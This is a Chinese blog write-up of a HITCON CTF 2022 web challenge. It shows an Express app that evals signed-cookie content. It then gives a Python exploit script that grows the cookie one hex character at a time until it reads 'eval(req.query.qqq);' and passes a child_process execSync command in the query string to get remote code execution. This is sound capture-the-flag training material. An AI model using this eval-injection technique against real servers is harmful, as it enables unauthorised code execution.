Hitcon CTF 2022 Web RCE

已于 2023-01-05 18:24:44 修改
阅读量1.3k 收藏 3
点赞数 2
文章标签: web安全 node.js
于 2022-12-29 23:29:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_66748496/article/details/128489378
版权

附件中包含完整源代码

复现平台CTFHUB
app.js:

const express = require('express');
const cookieParser = require('cookie-parser')
const crypto = require('crypto');

const randomHex = () => '0123456789abcdef'[~~(Math.random() * 16)];

const app = express();
app.use(cookieParser(crypto.randomBytes(20).toString('hex')));

app.get('/', function (_, res) {
    res.cookie('code', '', { signed: true })
        .sendFile(__dirname + '/index.html');
});

app.get('/random', function (req, res) {
    let result = null;
    if (req.signedCookies.code.length >= 40) {
        const code = Buffer.from(req.signedCookies.code, 'hex').toString();
        try {
            result = eval(code);
        } catch {
            result = '(execution error)';
        }
        res.cookie('code', '', { signed: true })
            .send({ progress: req.signedCookies.code.length, result: `Executing '${code}', result = ${result}` });
    } else {
        res.cookie('code', req.signedCookies.code + randomHex(), { signed: true })
            .send({ progress: req.signedCookies.code.length, result });
    }
});

app.listen(5000);

审计代码发现Express中间件cookieParser的签名使用的是随机生成的20位16进制字符,不可破解

但当req.signedCookies.code没有达到40长度时会将在原cookie里添加一个randomHex()

重新返回一个符合规范的Cookie

因而只要保留需要的cookie进行重复操作,拼接完整语句就能实现RCE

然而40字符解码后20字符,不能实现nodejs中的调用系统命令

遂采用eval(req.query.qqq);的方式获取GET参数以绕过

exp:

import requests
import json

def getChar(text):
    for i in range(len(text)):
        if text[i] == ".":
            return text[i-1]

def getCookies(text):
    for i in range(len(text)):
        if text[i] == "=":
            p1 = i
        if text[i] == ";":
            p2 = i
            break
    ret = {"code":text[p1+1:p2], "Path":"/"}
    return ret

a = "6576616c287265712e71756572792e717171293b"    #eval(req.query.qqq);
b = 'require("child_process").execSync("calc").toString()'

url = "http://subdomain.ctfhub.com:10800/random"
s = requests.get(url="http://subdomain.ctfhub.com:10800/")
print(url+f"?a={b}")

cookies = getCookies(s.headers["Set-Cookie"])
print(cookies)
i = 0
while i < len(a):
    s = requests.get(url=url,cookies=cookies)
    if getChar(s.headers["Set-Cookie"]) == a[i]:
        cookies = getCookies(s.headers["Set-Cookie"])
        i = i + 1
print(s.headers["Set-Cookie"])
s = requests.get(url=url+f"?qqq={b}",cookies=cookies)
print(s.text)
randomErr
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFHUB-WEB-RCE
K_ShenH的博客
06-16 807
CTFHUB-WEB-RCE
CTFHUB-web-RCE
ookami6497的博客
12-03 1384
CTFHub:Rce
最新发布
2301_80911344的博客
04-06 1028
RCE,即远程代码执行(Remote Code Execution),是指攻击者通过网络向目标计算机发送恶意指令或代码,成功地在目标计算机上远程执行这些指令或代码的能力。RCE是一种严重的安全漏洞,因为它允许攻击者在没有物理接触或认证的情况下控制另一台计算机。获取系统的控制权限。改变或破坏数据。启动或终止进程。在受影响的系统上安装恶意软件。监视用户行为或窃取敏感信息。因为RCE能够提供如此高级的控制权限,所以这类漏洞通常被认为是非常严重的,并且在被发现后应该立即修补。
【2.19-2.25刷题记录】
qq_74240553的博客
02-19 261
ctf刷题
CTFWEB题——RCE
tomyyyyy
10-31 5911
CTFWEB题——RCE 目录CTFWEB题——RCE相关函数命令执行代码注入绕过方式空格命令分隔符关键字限制长度限制回显无字母、数字getshell异或取反自增实例相关函数 命令执行 system() #string system ( string $command [, int &$return_var ] ) #system()函数执行有回显,将执行结果输出到页面上 &lt...
2022-HitCon-Web-yeeclass WP
qq_66748496的博客
12-27 1951
复现平台靶机为一个完整类论坛网页,题目给了服务端完整代码。
[HITCON CTF 2022] crypto bypass
weixin_52640415的博客
11-29 651
中国剩余定理 AES MODE_CTF nonce
CTF学习)CTFHUB-WEB-RCE
weixin_43486981的博客
08-14 4868
CTFHUB-WEB-RCERCEeval执行文件包含strpos()的漏洞php://input知识点 php://input远程包含读取源代码php://filter命令注入linux中命令的链接符号过滤catlinux查看文本的命令过滤空格过滤目录分隔符过滤运算符综合过滤练习 RCE RCE英文全称:remote command/code execute(远程命令/代码执行漏洞) 分为远程命令执行ping和远程代码执行evel。 漏洞出现的原因:没有在输入口做输入处理。 我们常见的路由器、防火墙、入侵
[SWPUCTF 2021 新生赛]finalrce wp
Leaf_initial的博客
04-12 485
PHP为了防止正则表达式的拒绝服务攻击(reDOS),给pcre设定了一个回溯次数上限pcre.backtrack_limit默认1000000,超过1000000不会返回1或0而是false即超过限制即可。
linux中的链接符号
m0_55754984的博客
09-13 624
1.每个命令之间用;隔开 说明:各命令的执行给果,不会影响其它命令的执行。换句话说,各个命令都会执行,但不保证每个命令都执行成功。 2.每个命令之间用&&隔开 说明:若前面的命令执行成功,才会去执行后面的命令。这样可以保证所有的命令执行完毕后,执行过程都是成功的。 3.每个命令之间用||隔开 说明:||是或的意思,只有前面的命令执行失败后才去执行下一条命令,直到执行成功一条命令为止。 4. | 是管道符号。管道符号改变标准输入的源或者是标准输出的目的地。 5. & 是后台任务符号。
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理...............................................................................................................................................................................
windowsland:HITCON CTF 2018
03-19
这是HITCON CTF 2018中挑战“ windowsland”的来源和文章 这个想法是利用Windows用户模式堆中的悬空指针利用安全取消链接 如果有人想直接学习该技术,请参阅unlink_chunk.cpp 脆弱性 bug1:泄漏 复制期间,所有的...
HITCON-Training-Writeup:https的简要说明
04-29
HITCON培训 我为做了简短的 有关Linux二进制开发的信息,请参见。 环境设定 git clone https://github.com/scwuaptx/HITCON-Training.git ~/ cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh ...
writeup:CTF挑战撰写
05-28
欢迎阅读我们的文章!... :HITCON CTF 2019 :简易PHP UAF :BroadcastTest :2020 de1ctf写入 :0CTF / TCTF 2020质量报告 :GeekPwn云上挑战赛 20201020-n1ctf :N1CTF 2020撰写 20210111-rwctf-
hitcon2015:Microsoft Edge MemGC内部
05-12
2014年,Microsoft推出了两个新的漏洞利用缓解措施,称为“隔离堆”和“ MemoryProtection”。 这些缓解措施大大增加了释放后使用(UAF)漏洞利用的难度,但是当指向释放块的指针没有保留在堆栈上时,仍有许多方法...
[HITCON CTF 2022] Superprime,rev Meow_way,BabySSS格基约减法,Secret共模攻击模未知
weixin_52640415的博客
12-02 702
RSA p,q相关 3种爆破方式 10进制
CTFHUB学习题解Web(5)-RCE
独沐晨霖
07-31 826
注: 1.是个正在学习的新手,连脚本小子都不够格 2. 很多题目都很基础,但是都做了详细截图 3. 题库尚不完全,没有内容的分支先直接跳过,等题库更新再做添加 4. 大标题为版块名,小标题为题目名 5. 个人学习记录和复习使用,如有错误欢迎指正 文章目录eval执行文件包含php://input远程包含读取源代码命令注入过滤cat过滤空格过滤目录分隔符过滤运算符综合过滤练习 eval执行 文件包含 php://input 远程包含 读取源代码 命令注入 过滤cat 过滤空格 过滤目录分隔符 过滤运算符
ctfshow每周大挑战之RCE极限挑战
qq_53058639的博客
02-02 868
这是一个争议比较大的问题,有的人会建议先学编程,而有的人会建议先学计算机基础,其实这都是要学的。第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。/值,可以查看到根目录有个f1agaaa文件,貌似是flag文件,如下图所示,参数_传system,参数0传cat /f*,打开得到falg。
[hitcon 2017]ssrfme 1
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。此题的目标是通过一个输入参数包含的URL,探测出内部的flag并输出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值